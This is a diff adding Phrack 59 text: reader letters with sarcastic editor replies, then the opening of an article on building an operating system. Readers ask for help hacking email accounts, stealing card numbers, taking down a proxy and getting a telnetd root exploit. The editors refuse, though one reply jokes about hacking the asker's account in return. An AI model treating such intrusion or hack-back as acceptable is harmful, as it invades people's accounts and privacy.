+  [ If you are in a country that does not have consumer Caller ID, or
+    provider ANI, then just follow the cord attached to the end your
+    telephone until you find the person at the other end.  Ask them
+    nicely if they called you. ]
+
+Rob
+Kenneth J. Bungert,,,
+
+|=[ 0x01 ]=--------------------------------------------------------------=|
+
+http://www.atstake.com/company_info/management.html#mudge
+
+  [ Look what they did to mudge/Peiter Zatko. They cut his hair,
+    tied a tie around his neck and covered his body with a suite.
+    They wrote that he was the CEO (CEO?, #1?) of [the company named]
+    "L0pht Heavy Industries".
+    My comment: 'They made a clown out of a well respected smart guy/hacker
+    who should be better descriped as 'a key figure in americans famous
+    underground hacking group known as L0pft Heavy Industries'. I hope
+    the tie will not become too tight mudge :/ ]
+
+
+|=[ 0x02 ]=--------------------------------------------------------------=|
+
+From: mac119@hotmail.com
+
+Hello i need some help.
+
+   [ Come to us, we enlight and answer all your worries! ]
+
+if someone can hack down 172.26.100.10:8080 and take down the proxy server,
+would make me very happy.
+
+   [ ..would pretty much impress me. Most of your questions can be
+     answered by reading RFC1918. ]
+
+NB! if someone do that, they will get a little reward from me, $120.
+tanks again
+                   Ice
+
+|=[ 0x03 ]=--------------------------------------------------------------=|
+
+Dear Hacker
+
+i am 29 y/o male and very intrested in hacking my girlfriends Emails
+in "Yahoo" and "Hotmail" . please instruct me if it has an straighforward
+solution or anything help me in this regard.
+i have tried some softwares about this but they didnt work properly
+and no result achieved. please Email ur hints to ab_c28@yahoo.com
+thank you for your prompt attention.
+regards.
+
+Bob Z.
+NEVER SEND SPAM. IT IS BAD.
+
+  [ Dear Lamer
+
+    After hacking your Yahoo! account we acquired your girlfriend's email
+    address and proceeded to inform her about your curiosity.
+
+    After speaking with her about this incident she agreed that we should
+    expose you for the perverse idiot that you are.  Get a life. ]
+
+|=[ 0x04 ]=--------------------------------------------------------------=|
+
+From: "brad" <mulder428@hotmail.com>
+
+Hey guys..I am a beginner and i am trying to find all the information that
+i can on how to learn everything that you guys know...i am not asking for
+you to tell me how to hack into hotmail or yahoo mail like some of the
+other people here but i just want any kind of information that you can give
+me on how to learn anything and everything about what you guys do,
+
+  [ Do you know what it is that we know?  We don't know what we know, we
+    just know that we know it.
+
+    An obvious self-promotional answer would be to read Phrack... ]
+
+With much respect,
+Ryan
+
+|=[ 0x05 ]=--------------------------------------------------------------=|
+
+From: Jason De Grandis <JasonD@activ.net.au>
+Subject: [phrackstaff] Hacking / Cracking
+
+I am new to the world of hacking and cracking, and I want to get some info
+on the above.
+
+  [ Welcome to our world, Jason. ]
+
+What I want to do is, obtain credit card numbers, get email passwords and
+get into NASA and the FBI, if I am lucky.  The sort of stuff the movie
+"Hackers" illustrated.  I don't know if this can be done, if it can, can
+someone email me the information or point me into the right direction on
+were to start.
+
+  [ Sounds like some pretty serious stuff you want to get into.  I
+    recommend watching Hackers a few more times and then getting yourself
+    some Gibsons.  Remember -- the most commonly used passwords are "love",
+    "sex", "secret" and "god" -- BUT NOT NECESSARILY IN THAT ORDER YOU
+    FUCKING LAMER! ]
+
+Where do I go and what do I need.  I have started learning LINUX, as I have
+been told it is something to know and learn.  What else do I need???
+
+  [ A system, a clue, some Phrack issuez for you
+    Learn Unix and learn it good, learn it like a ninja would
+    If you do not have a clue yet, some 0day you must get
+    Hack the planet in a night, backdoor that shit up tight
+    Sell each root for a buck...
+    OH MY GOD YOU FUCKING SUCK!@#!#!$ ]
+
+J.
+
+  [ S. ]
+
+|=[ 0x06 ]=--------------------------------------------------------------=|
+
+Hey again Phrack
+
+  [ Hello ]
+
+I have now read quite a few of your magazines. BUT there is a pretty
+nasty failure in number 56... Either the index file is misplaced or the
+articles are. They don't match, that's for sure!
+
+  [ It is all fine.  It is indexed in hex (the index file is quite clear if
+    you bother to read it -- p56-0x01) ]
+
+If you have gotten the time for it could you then please fix it. And I
+would be happy if you would send me a copy of the correct one when
+finished..
+
+  [ No.  It's not broken, chump. ]
+
+Thank you.
+
+/Dark Origin
+
+~If you think nobody cares, try missing a  couple of payments.~
+
+  [ Trust me.  Nobody cares. ]
+
+|=[ 0x07 ]=--------------------------------------------------------------=|
+
+From: syiron the sex man <syiron@eynet.cc>
+To: <somegroup@somedomain>
+Subject: i would like to surf telnetd daemon services
+
+hello <grup name> the best crew in the world
+
+  [ Thank you. ]
+
+i had search remote buffer to gain access root in telnetd port daemon but
+i fail to do it
+
+  [ I feel your pain. ]
+
+can you make me one of the remote to attack solaris sparc ... attack from
+linux or solaris
+
+  [ Nope! ]
+
+thanks
+need code
+
+  [ Need life. ]
+
+syiron
+
+|=[ 0x08 ]=--------------------------------------------------------------=|
+
+Hi! Can you to speak to me the learn for to speak the Unix?
+
+  [ I wish Unix I knew to speak it to you good hehe! ]
+
+|=[ 0x09 ]=--------------------------------------------------------------=|
+
+From: "I. O. Jayawardena" <ioshadi@sltnet.lk>
+Subject: [phrackstaff] Best wishes
+
+Greetings guys (and gals?),
+
+  [ Greetings, I. O. ]
+
+        First things first: Phrack is a really good e-zine, and loopback is
+just great, but you knew this already ;)
+
+  [ Of course! ]
+
+I'm an aspiring hacker and all-round geek. Girls are scarce over here;
+knowledge even more so. I developed the hacker state of mind when I was
+exposed to the Net, while I was studying like a demon for a competition
+which landed me my Celeron (with some peripherals). While surfing two
+days ago, I stumbled onto phrack.org and an old flame was rekindled; So
+here I am...
+        Really guys, Phrack is a good thing. Keep up the good work. The
+home page is very nice too... Maybe even chicks will dig it ;)
+
+  [ The webmaster has been hoping they would since day 1. ]
+
+        I'm a pretty good C and C++ programmer, and the only difficulty I
+have is money. NO credit cards to pay for books I can buy only online. I'd 
+be very grateful if anyone over there could give me the location of a
+_free_ machine-readable copy of "The C Programming Language" by K&R. I
+doubt if even the universities over here have it (off the record, some
+professors here don't know that printf(...) actually returns something, but
+claim to have written Linux kernel modules :| ).
+
+  [ If you're a pretty good C programmer, why do you need that particular
+    book?  Are you lying to us?  Try a library. ]
+
+        Anyway, thanks, and I can say with absolute, nay, non-relative
+certainty that the number of Phrack readers has increased by one
+non-atomically.
+
+  [ Geek! ]
+
+        alvin
+
+PS: if the only "alvin" you can recall is alvin of the chipmunks, read
+up a bit on the works of Sir Arthur C. Clarke.
+
+  [ No thanks, I'll take your word for it, chipmunk. ]
+
+|=[ 0x0a ]=--------------------------------------------------------------=|
+
+From: "RAZ" <rafmalai@rafmalai.worldonline.co.uk>
+
+HI
+I WONDER IF U CAN HELP ME
+
+  [ HI, MAYBE IF YOU STOP SHOUTING! ]
+
+MY NAME IS RAZ AND I LIVE IN LONDON, I HAVE A CONNECTION LINE WITH BT FOR
+OUR PHONE.
+
+  [ That's very nice, Baz.  But you're still shouting! ]
+
+RECENTLY WE REC.D OUR BILL WHICH WERE PHONES MADE WHICH WE HAVE NOT MADE,
+LONG MOBILE PHONES AND INTERNATIONAL, AND WE EVEN THINK WE KNOW WHO DID BUT
+HOW?? IS IT POSSIBLE TO DO PHONE HACKING OR TAPPING ?
+
+  [ Of course.  Don't you read Phrack? ]
+
+IF SO HOW..
+BT SAID THERE IS NOT WAY AND WE HAVE TO PAY THE BILL WHICH WE WILL BUT
+INSIDED OUR HEARTS WE KNOW WE DID NOT DO THEM..
+CAN U HELP
+
+  [ I think you're beyond help. ]
+
+|=[ 0x0b ]=--------------------------------------------------------------=|
+
+From: "Marcel Feuertein" <webgateknight@hotmail.com>
+Subject: [phrackstaff] You have a slight problem on your site.
+
+Hello, to whom it may concern;
+
+When I went to your 'download' link it opened in 'edit' mode..
+showing me the total >> Index of /archives>> without the HTML.
+
+  [ Really?  That's disgraceful! ]
+
+Found your site while searching Yahoo on how to play a video file I
+downloaded with an .AVI extension with a comment " EG-VCD" after the name
+of file, which causes my Windows Media Player to play only the sound ..
+without the video.
+
+  [ Interesting. ]
+
+Thus I was looking for a player/codec to solve this problem.
+
+  [ Good luck. ]
+
+Any suggestions are appreciated.
+
+  [ I'm all out of ideas. ]
+
+Your site has been added to my favorites. I truly enjoy your content.
+Congratulations.
+
+  [ Thanks. ]
+
+Take care
+
+Marcel
+
+|=[ 0x0c ]=--------------------------------------------------------------=|
+
+From: richard fraser <SD_clan@e-mile.co.uk>
+Subject: [phrackstaff] problem
+
+what do i run the programmme under ,you know like what programme do i run
+it in
+
+  [ I've been asking myself that question all my life. ]
+
+richard
+
+|=[ 0x0b ]=--------------------------------------------------------------=|
+
+From: bobby@bobby.com
+Subject: [phrackstaff] phrakz
+
+Hi,
+My nickname is Bobby - Happy Bobby, im 14 years hacker, & im so happy
+becouse of pCHRAK (or sumthin) 58 issue, finally i had found
+information how to break into pentagon server, but i have one littl3
+pr0blem, i dunno how to log into this server i had tried telnet
+pentagon.org but my Windows said "Cannot found telnet.exe file", could you
+tell me what am i doing wrong?
+
+PS.My dick is now 32cm long!, one year ago it was only 5cm, how about
+yours?
+
+s0ry 4 my b4d inglish (i ate all sesame-cakes :),
+
+ps0x01.gr33tz to all hacker babes (if they really exists i bet they
+would like to hack into my pants & meet Big Bobby :)
+ps0x02.i tak mierdzicie ledziem :)
+ps0x03.pana guampo kanas e ribbon hehe
+psx.cya
+
+Happy Bobby
+
+   [ ... ]
+
+|=[ 0x0c ]=--------------------------------------------------------------=|
+
+From: "DANIEL REYNOLDS" <icyflame177@msn.com>
+
+hey yall, I havent done many articles but i think i am up to the
+challenge.  Do you know a subject that I could write on that the
+ppl that read phrack would enjoy?  thankz,
+
+           ~][cyflame
+
+    [ Try it with "The insecurity of my ISP, MSN.COM" ]
+
+|=[ 0x0d ]=--------------------------------------------------------------=|
+
+From: piracy <piracy@microsoft.com>
+To: phrackedit@phrack.com
+Subject: [phrackstaff] How are you
+
+     [ ?! thnx, and you guys? ]
+
+
+|=[ 0x0e ]=--------------------------------------------------------------=|
+
+I got this message from you:
+
+> To:      luigi@cs.berkeley.edu
+> From:    phrackstaff-admin@phrack.org
+> Subject: Your message to phrackstaff awaits moderator approval
+>
+> Posting to a restricted list by sender requires approval
+> Either the message will get posted to the list, or you will receive
+> notification of the moderator's decision.
+
+   [ hmm, yes indeed, interesting. Hmm. What might this be Dr.Watson?
+     The moderator's decision is to investigate this posting a little
+     bit further. ]
+
+However, I never sent a message to phrackstaff before this one.  So there
+seems to be a problem.  I would kindly request that you do NOT post the
+message, since I don't know what it contains and don't want it to be
+attributed to me.
+
+Thank you very much
+Luigi Semenzato
+
+|=[ 0x0f ]=--------------------------------------------------------------=|
+
+From: gobbles@hushmail.com
+Subject: ALERT! BLUE BOAR IS IN #PHRACK! ALERT!
+
+The Blue Boar is currently chatting in #phrack!
+ALERT!  ALERT!  ALERT!
+
+   [ Noone of us is in control of this channel. We chill where no
+     phrack staff has chilled before... ]
+
+|=[ 0x10 ]=--------------------------------------------------------------=|
+
+From: "Brian Herdman" <bherdman20@hotmail.com>      
+
+Hey.                                                                            
+
+    [ y0! ]
+
+      im looking for a copy of the jolly rodger cook book                       
+i used to have it but my hard drive fried and i thought it was gone             
+forever.....                                                                  
+
+    [ Man, I've been looking for that one for the last 15 years
+      on www.phrack.org but i guess one of the previous editors just
+      rm'ed it. jolly rodger cook book, yummm yumm, that's what's
+      missing on our page....]
+
+|=[ 0x11 ]=--------------------------------------------------------------=|
+
+From: son gohan <ssjchris61@yahoo.com>
+Subject: [phrackstaff] phreak boxes       
+
+Hi can i get some info on the tron box?                                     
+
+    [ PHRACK != GOOGLE ]
+
+|=[ 0x12 ]=--------------------------------------------------------------=|
+
+From: "Bruce's Email" <bruce@adranch.com>
+Subject: [phrackstaff] Passwords
+Date: Wed, 10 Apr 2002 13:45:44 -0500
+
+How do I figure out someone's password and user name if I have their e-mail
+address?
+
+    [ The easiest way is just to ask him:
+      echo "ALL UR PASSW0RDZ R BEL0NG TO US!" | mail target@hotmail.com ]
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack59/3.txt b/phrack59/3.txt
new file mode 100644
index 0000000..e750b89
--- /dev/null
+++ b/phrack59/3.txt
@@ -0,0 +1,2889 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3b, Phile #0x03 of 0x12
+
+|=---------------------=[ L I N E N O I S E ]=---------------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ phrackstaff ]=------------------------------=|
+
+
+--[ Contents
+
+  1 - PHRACK Linenoise Introduction
+    1.1 PHRACK Oops
+    1.2 PHRACK Fakes
+
+  2 - PHRACK OS Construction
+
+  3 - PHRACK ninja lockpicking
+
+  4 - PHRACK sportz: fingerboarding
+
+--[ 1 - PHRACK Linenoise Introduction
+
+    I think you know what linenoise is about. We had the same
+cut & paste Linenoise Introduction in the last 10 issues :)
+
+
+----[ 1.1 - PHRACK Oops
+
+Oops, For the last 17 years we forgot the .txt extension to the
+articles.
+
+
+Some reader complained about a little mistake in p59-0x01:
+phrack:~# head -20 /usr/include/std-disclaimer.h
+22 lines of the header are actually printed :P
+
+The message of the disclaimer remains:
+1) No guarantee on anything.
+2) Nobody is responsible.
+3) Dont blame us if your kids turn into hackerz.
+
+
+----[ 1.2 - PHRACK Fakes
+
+http://www.cafepress.com/cp/store/store.aspx?storeid=phrack
+
+That's not us.
+Check out our homepage at http://www.phrack.org for some tshirts.
+
+
+
+|=[ 0x02 ]=-------=[ Methodology For OS Construction ]=------------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------=[ Bill Blunden <wablunden@hotmail.com> ]=---------------=|
+
+--[ Contents
+
+  0 - Introduction
+
+  1 - The Critical Path
+	1.1 Choose a Host Platform
+	1.2 Build a Simulator
+	1.3 Build a Cross-Compiler
+	1.4 Build and Port The OS
+	1.5 Bootstrap the Cross-Compiler
+
+  2 - OS Components
+	2.1 Task Model
+	2.2 Memory Management
+	2.3 I/O interface
+	2.4 File System
+	2.5 Notes On Security
+
+  3 - Simple Case Study
+	3.1 Host Platform
+	3.3 Compiler Issues
+	3.4 Booting Up
+	3.5 Initializing The OS
+	3.6 Building and Deploying
+
+  4 - References and Credits
+
+--[ 0 - Introduction
+
+Of the countless number of books on operating system design, there are
+perhaps only three or four, that I know of, which actually discuss how to
+build a fully-functional operating system. Even these books focus so
+narrowly on specific hardware that the essential steps become buried
+under a pile of agonizing minutiae. This is not necessarily a bad thing,
+rather it is an unintended consequence. Operating systems are incredibly
+complicated pieces of software, and dissecting one will yield countless
+details.
+
+Nevertheless, my motivation for submitting this article is to provide a
+generic series of steps which can be used to build an OS, from scratch,
+without bias towards a particular hardware vendor.
+
+"Geese Uncle Don, how do you build an OS ..."
+
+My own understanding of OS construction was rather sketchy until I had the
+privilege of meeting some old fogeys from Control Data. These were people
+who had worked on the CDC 6600 with Seymour Cray. The methodology which I
+am passing on to you was used to build Control Data's SCOPE76 operating
+system. Although some of the engineers that I spoke with are now in their
+70s, I can assure you that the approach they described to me is still very
+useful and relevant.
+
+During the many hours that I pestered these CDC veterans for details, I
+heard more than a few interesting war stories. For example, when Control
+Data came out with the 6600, it was much faster than anything IBM was
+selling. The execs at Big Blue were so peeved at being upstaged by Cray
+that they created a paper tiger and told everyone to wait a few months.
+Unfortunately, it worked. Everyone waited for IBM to deliver ( IBM never
+did, those bastards ) and this forced CDC to drop the price of the 6600
+in half in order to attract customers.
+
+If you are familiar with IBM's business practices, this type of behavior
+comes as no surprise. Did you know that IBM sold Hollerith tabulators to
+the Nazis during WWII?
+
+This article is broken into three parts.
+
+Part 1 presents a general approach that may be used to build an operating
+system. I am intentionally going to be ambiguous. I want the approach to
+be useful regardless of which hardware platform you are targeting.
+
+For the sake of focusing on the process itself, I delay the finer details
+of construction until Part 2. In Part 2, I present a rough map that can be
+used to determine the order in which the components of the OS should be
+implemented.
+
+For the sake of illuminating a few of the issues that a system engineer
+will face during OS implementation, I have included a brief discussion
+of an extended example in part 3. My goal in part 3 is to illustrate some
+of the points that I make in part 1. I have no intention of offering a
+production quality OS, there are already a number of excellent examples
+available. Interested readers can pick up any of the references provided
+at the end of this article.
+
+--[ 1 - The Critical Path
+
+In the stock market, you typically need money in order to make money.
+Building an OS is the same way: you need an OS in order to build one.
+
+Let's call the initial OS, and the hardware that it runs on, the 'host'
+platform. I will refer to the OS to be constructed, and the hardware that
+it will run on, as the 'target' platform.
+
+--[ 1.1 - Choose a Host Platform
+
+I remember asking a Marine Corp Recon guy once what he thought was the
+most effective small sidearm. His answer: "whichever one you are the most
+familiar with."
+
+The same holds true for choosing a host platform. The best host platform
+to use is the one which you are the most familiar with. You are going to
+have to perform some fancy software acrobatics and you will need to be
+intimately familiar with both your host OS and its development tools. In
+some more pathological cases, it may even help to be familiar with the
+machine instruction encoding of your hardware. This will allow you to
+double check what your development tools are spitting out.
+
+You may also discover that there are bugs in your initial set of tools,
+and be forced to switch vendors. This is a good reason for picking a host
+platform which is popular enough that their are several tool vendors to
+choose from. For example, during some system work, on Windows, I
+discovered a bug in Microsoft's assembler (MASM). As it happened, MASM
+would refuse to assemble a source file which exceeded a certain number of
+lines. Fortunately, I was  able to buy Borland's nifty Turbo Assembler
+(TASM) and forge onward.
+
+--[ 1.2 - Build a Simulator
+
+Once you've picked a host platform and decided on an appropriate set of
+development tools, you will need to build a simulator that replicates the
+behavior of the target platform's hardware.
+
+This can be a lot more work than it sounds. Not only will you have to
+reproduce the bare hardware, but you will also have to mimic the BIOS which
+is burned into the machine's ROM. There are also peripheral devices and
+micro controllers that you will need to replicate.
+
+Note: The best way to see if you have implemented a simulator correctly is
+to create an image file of a live partition and see if the simulator will
+run the system loaded on it. For example, if you built an x86 simulator,
+then you could test out an image file of a Linux boot partition.
+
+The primary benefit of the simulator is that it will save you from having
+to work in the dark. There is nothing worse than having your machine
+crash and not being able to determine why. Watching your Intel box triple
+fault can be extremely frustrating, primarily because it is almost
+impossible to diagnose the problem once it has occurred. This is
+particularly true during the boot phase, where you haven't built enough
+infrastructure to stream messages to the console.
+
+A simulator allows you to see what is happening in a safe, and controlled,
+environment. If your code crashes the simulator, you can insert diagnostic
+procedures to help perform forensic work. You can also run the simulator
+from within the context of a debugger so that you can single-step through
+tricky areas.
+
+The alternative is to run your OS code on raw metal, which will basically
+preclude your ability to record the machine's state when it crashes. The
+diagnostic and forensic techniques which you used with the simulator will
+be replaced by purely speculative tactics. This is no fun, trust me.
+
+For an excellent example of a simulator, you should take a look at the
+bochs x86 simulator. It is available at:
+
+			http://sourceforge.net/projects/bochs
+
+Once thing that I should mention is that it is best to use bochs in
+conjunction with Linux. This is because bochs works with disk images and
+the Linux 'dd' command is a readily available and easy way to produce
+a disk image. For example, the following command takes a floppy disk and
+produces an image file named floppy.img.
+
+			dd if=/dev/fd0 of=floppy.img bs=1k
+
+Windows does not ship with an equivalent tool. Big surprise.
+
+"Back in my day ..."
+
+In the old days, creating a simulator was often a necessity because
+sometimes the target hardware had not yet gone into production. In those
+days, a smoke test was truly a smoke test ... they turned on the machines
+and looked for smoke!
+
+--[ 1.3 - Build a Cross-Compiler
+
+Once you have a simulator built, you should build a cross-compiler.
+Specifically, you will need to construct a compiler which runs on the host
+platform, but generates a binary which is run by the target platform.
+Initially you will use the simulator to run everything that the cross-
+compiler generates. When you feel confident enough with your environment,
+you can start running code directly on the target platform.
+
+"Speaking words of wisdom, write in C..."
+
+Given that C is the de facto language for doing system work, I would
+highly recommend getting the source code for compiler like gcc and
+modifying the backend. The gcc compiler even comes with documentation
+dedicated to this task, which is why I recommend gcc. There are other
+public C compilers, like small-C, that obey a subset of the ANSI spec
+and may be easier to port.
+
+			gcc:		http://gcc.gnu.org
+			small-C: 	http://www.ddjembedded.com/languages/smallc
+
+If you want to be different, I suppose you could find a Pascal or Fortran
+compiler to muck around with. It wouldn't be the first time that someone
+took the less traveled route. During the early years, the Control Data
+engineers invented their own variation of Pascal to construct the
+NOSVE (aka NOSEBLEED) OS. NOSVE was one of those Tower of Babel projects
+that never made it to production. At Control Data, you weren't considered
+a real manager until you had at least one big failure under your belt. I
+bet NOS/VE pushed the manager up to VP status!
+
+--[ 1.4 - Build and Port The OS
+
+OK, you've done all the prep work. It's time to code the OS proper. The
+finer details of this process are discussed in Part 2. Once you have
+a prototype OS built than runs well on the simulator you will be faced
+with the -BIG- hurdle ... running your code on the actual target hardware.
+
+I found that this is a hurdle which you should jump early on. Do a test
+run on the target platform as soon as you have the minimal number of
+working components. Discovering that your code will not boot after 50,000
+lines of effort can be demoralizing.
+
+If you were disciplined about designing and testing your simulator, most
+of your problems will probably be with the OS code itself and perhaps
+undocumented features in peripheral hardware controllers. This is where
+investing the time in building a bullet-proof simulator truly pays off.
+Knowing that the simulator does its job will allow you to more accurately
+diagnose problems ... and also save you plenty of sleep.
+
+Finally, I would recommend using a boot disk so that you don't put the
+hard drive(s) of your target machine at risk. Even the Linux kernel can
+be made to fit on a single floppy, so for the time being try not to worry
+about binary size constraints.
+
+--[ 1.5 - Bootstrap the Cross-Compiler
+
+Congratulations. You have gone where only a select few have gone before.
+You've built an operating system. However, wouldn't it be nice to have
+a set of development tools that can be run by your new OS? This can be
+achieved by bootstrapping the existing cross-compiler.
+
+Here's how bootstrapping works: You take the source code for your cross-
+compiler and feed it to the cross-compiler on the host platform. The
+cross-compiler digests this source code and produce a new binary that can
+be executed by the target OS. You now have a compiler that runs on the
+target OS and which creates executables that also run on the target OS.
+
+Naturally, I am making a few assumptions. Specifically, I am assuming that
+the libraries which the cross-compiler uses are also available on the
+target OS. Compilers spend a lot of time performing string manipulation and
+file I/O. If these supporting routines are not present and supported on the
+target platform, then the newly built compiler is of little utility.
+
+--[ 2 - OS Components
+
+An OS is a strange sort of program in that it must launch and manage
+itself in addition to launching and managing other programs. Hence, the
+first thing that an operating system needs to do is bootstrap itself and
+then set up its various components so that it can do its job.
+
+I would recommend getting your hands on the vendor documentation for
+your hardware. If you are targeting Intel, then you are in luck because
+I explain the x86 boot process in Part 3 of this article.
+
+In terms of overall architecture, I would recommend a modular, object-
+oriented, design. This doesn't mean that you have to use C++. Rather, I
+am encouraging you to delineate the various portions of the OS into
+related sets of data and code. Whether or not you use a compiler to
+enforce this separation is up to you. This approach has its advantages
+in that it allows you to create sharply delineated boundaries between
+components. This is good because it allows you to hide/modify each
+subsystem's implementation.
+
+Tanenbaum takes this idea to an extreme by making core components, like
+the file system and memory manager, pluggable at runtime. With other
+operating systems, you would have to re-compile the kernel to swap
+core subsystems like the memory manager. With Minix, these components
+can be switched at runtime. Linux has tried to implement something
+similar via loadable kernel modules.
+
+As a final aside, you will want to learn the assembly language for the
+target platform's hardware. There are some OS features that are tied
+directly to hardware and cannot be provided without executing a few dozen
+lines of hardware-specific assembler. The Intel instruction set is
+probably one of the most complicated. This is primarily due to historical
+forces that drove Intel to constantly strive for backwards compatibility.
+The binary encoding of Intel instructions is particularly perplexing.
+
+Which OS component should you tackle first?
+
+In what order should the components be implemented?
+
+I would recommend that you implement the different areas of functionality
+in the manner described by the following four sections.
+
+--[ 2.1 - Task Model
+
+In his book on OS design, Richard Burgess states that you should try to
+start with the task control code, and I would tend to agree with him.
+The task model you choose will impact everything else that you do.
+
+First, and foremost, an operating system manages tasks. What is a task? The
+Intel Pentium docs define a process as a "unit of work" (V3 p.6-1).
+
+What was that person smoking? It's like saying that a hat is defined as a
+piece of clothing. It doesn't give any insight into the true nature of a
+task. I prefer to think of a task a set of instructions being executed by
+the CPU in conjunction with the machine state which that execution
+produces.
+
+Inevitably, the exact definition of a task is spelled out by the operating
+system's source code.
+
+The Linux kernel (2.4.18) represents each task by a task_struct
+structure defined in /usr/src/linux/include/linux/sched.h. The kernel's
+collection of processes are aggregated in two ways. First, they are
+indexed in a hash table of pointers:
+
+		extern struct task_struct *pidhash[PIDHASH_SZ];
+
+The task structures are also joined by next_task and prev_task pointers
+to form a doubly-linked list.
+
+		struct task_struct
+		{
+			:
+			struct task_struct *next_task, *prev_task;
+			:
+		};
+
+You will need to decide if your OS will multi-task, and if so then what
+policy will it apply in order to decide when to switch between tasks
+( switching tasks is also known as a context switch ). Establishing a
+mechanism-policy separation is important because you may decide to change
+the policy later on and you don't want to have to re-write all the
+mechanism code.
+
+Context Switch Mechanism:
+-------------------------
+
+On the Intel platform, task switching is facilitated by a set of system
+data structures and a series of special instructions. Specifically,
+Intel Pentium class processors have a task register (TR) that is intended
+to be loaded (via the LTR instruction) with a 16-bit segment selector.
+This segment selector indexes a descriptor in the global descriptor table
+(GDT). The information in the descriptor includes the base address and
+size of the task state segment (TSS). The TSS is a state-information
+repository for a task. It includes register state data (EAX, EBX, etc. )
+and keeps track of the memory segments used by a given task. In other
+words, it stores the 'context' of a task.
+
+The TR register always holds the segment selector for the currently
+executing task. A task switch is performed by saving the state of
+the existing process in its TSS and then loading the TR with a new
+selector. How this actually occurs, in terms of what facilitates the
+re-loading of TR, is usually related to hardware timers.
+
+The majority of multi-tasking systems assign each process a quantum
+of time. The amount of time that a task receives is a policy decision.
+An on-board timer, like the 82C54, can be set up to generate interrupts
+at evenly spaced intervals. Every time these interrupts occur, the kernel
+has an opportunity to check and see if it should perform a task switch.
+If so, an Intel-based OS can then initiate a task switch by executing
+a JMP or CALL instruction to the descriptor, in the GDT, of the task to
+be dispatched. This causes the contents of TR to be changed.
+
+Using the timer facilitates what is known as preemptive multitasking.
+In the case of preemptive multitasking, the OS decides which task
+gets to execute in conjunction with a scheduling policy. At the other
+end of the spectrum is cooperative multitasking, where each task decides
+when to yield the CPU to another task.
+
+For an exhaustive treatment of task management on Intel, see Intel's
+Pentium manual (Volume 3, Chapter 6).
+
+Context Switch Policy:
+----------------------
+
+Deciding which process gets the CPU's attention, and for how long, is a
+matter of policy. This policy is implemented by the scheduler. The Linux
+kernel has a scheduler which is implemented by the schedule() function
+located in /usr/src/linux/kernel/sched.c.
+
+There are a lot of little details in the schedule() function related to
+handling the scenario where there are multiple processors, and there are
+also a couple of special cases. However, the core actions taken by the
+scheduler are relatively straightforward. The scheduler looks through the
+set of tasks that are eligible to execute. These eligible tasks are
+tracked by the runqueue data structure.
+
+The scheduler looks for the task on the runqueue with the highest
+'goodness' value and schedules that task for execution. Goodness is a
+value calculated by the goodness() function. It basically returns a
+value which reflects the need for the task to run.
+
+			Goodness Spectrum
+			-----------------
+			-1000: never select this
+			0: re-examine entire list of tasks, not just runqueue
+			+ve: the larger, the better
+			+1000: realtime process, select this.
+
+If the highest goodness values of all the tasks in the runqueue is zero,
+then the scheduler takes a step back and looks at all of the tasks, not
+just the ones in runqueue.
+
+To give you an idea of how this is implemented, I've included a snippet
+of the schedule() function and some of its more memorable lines:
+
+asmlinkage void schedule(void)
+{
+	struct schedule_data * sched_data;
+	struct task_struct *prev, *next, *p;
+	struct list_head *tmp;
+	int this_cpu, c;
+		:
+		:
+	/*
+	 * this is the scheduler proper:
+	 */
+
+	repeat_schedule:
+	/*
+	 * Default process to select..
+	 */
+	next = idle_task(this_cpu);
+	c = -1000;
+	list_for_each(tmp, &runqueue_head)
+	{
+		p = list_entry(tmp, struct task_struct, run_list);
+
+		if (can_schedule(p, this_cpu))
+		{
+			int weight = goodness(p, this_cpu, prev->active_mm);
+			if (weight > c){ c = weight, next = p; }
+		}
+	}
+
+	/* Do we need to re-calculate counters? */
+	if (unlikely(!c))
+	{
+		struct task_struct *p;
+
+		spin_unlock_irq(&runqueue_lock);
+		read_lock(&tasklist_lock);
+		for_each_task(p)
+		{
+			p->counter = (p->counter >> 1) + NICE_TO_TICKS(p->nice);
+		}
+		read_unlock(&tasklist_lock);
+		spin_lock_irq(&runqueue_lock);
+		goto repeat_schedule;
+	}
+		:
+		:
+
+--[ 2.2 - Memory Management
+
+A process both occupies and allocates memory. Once you have a task model
+sketched out, you will need to give it access to a memory management
+subsystem. Make sure to keep the interface to the memory subsystem clean,
+so that you can yank it out and replace it later, if you need to.
+
+On an OS level, memory protection is provided by two mechanisms:
+
+					i-	segmentation
+					ii-	paging
+
+You will have to decide whether or not you want to support these two
+features. Paging, in particular, is a hardware intensive task. This means
+that if you do decide to provide paging facilities, porting the OS will
+be difficult at best. According to Tanenbaum, this is the primary reason
+why Minix does not support paging.
+
+Segmentation can be enforced by hardware, or can be done manually via a
+sand boxing technique at the kernel level. Almost everyone relies on
+hardware based segmentation because it is faster. Like paging, hardware
+based segmentation will necessarily involve a lot of hardware specific
+code and a healthy dose of assembly language.
+
+The MMURTL operating system breaks its virtual address space into three
+segments. There's one code segment for the OS, one code segment for
+applications, and a single data segment. This doesn't exactly protect
+the applications from each other, but it does protect the OS.
+
+		MMURTL Segment		Selector Value
+		--------------		--------------
+		OS code				0x08
+		Apps code			0x18
+		Apps data			0x10
+
+MMURTL's memory subsystem is actually set up by the boot sector! That's
+correct, I said the boot sector. If you look at the source code in
+bootblok.asm, which Burgess compiles with TASM, you notice that the book
+code does the book keeping necessary to make the transition to protected
+mode. Here are a few relevant snippets from the file.
+
+
+		IDTptr	DW 7FFh		;LIMIT 256 IDT Slots
+				DD 0000h	;BASE (Linear)
+		GDTptr	DW 17FFh	;LIMIT 768 slots
+				DD 0800h	;BASE (Linear)
+				:
+				:
+		LIDT FWORD PTR IDTptr ;Load Processor ITD Pointer
+		LGDT FWORD PTR GDTptr ;Load Processor GDT Pointer
+				:
+				:
+		MOV EAX,CR0 ;Control Register
+		OR AL,1 ;Set protected mode bit
+		MOV CR0,EAX
+		JMP $+2 ;Clear prefetch queue with JMP
+		NOP
+		NOP
+		MOV BX, 10h ;Set up segment registers
+		MOV DS,BX
+		MOV ES,BX
+		MOV FS,BX
+		MOV GS,BX
+		MOV SS,BX
+
+		;We define a far jump
+		DB 66h
+		DB 67h
+		DB 0EAh
+		DD 10000h
+		DW 8h
+		; now in protect mode
+
+Before he loaded GDTR and IDTR, Burgess loaded the OS into memory so that
+the base address values in the selectors actually point to valid
+global and interrupt descriptor tables. It also saves him from having
+to put these data structures in the boot code, which helps because of
+the 512 byte size limit.
+
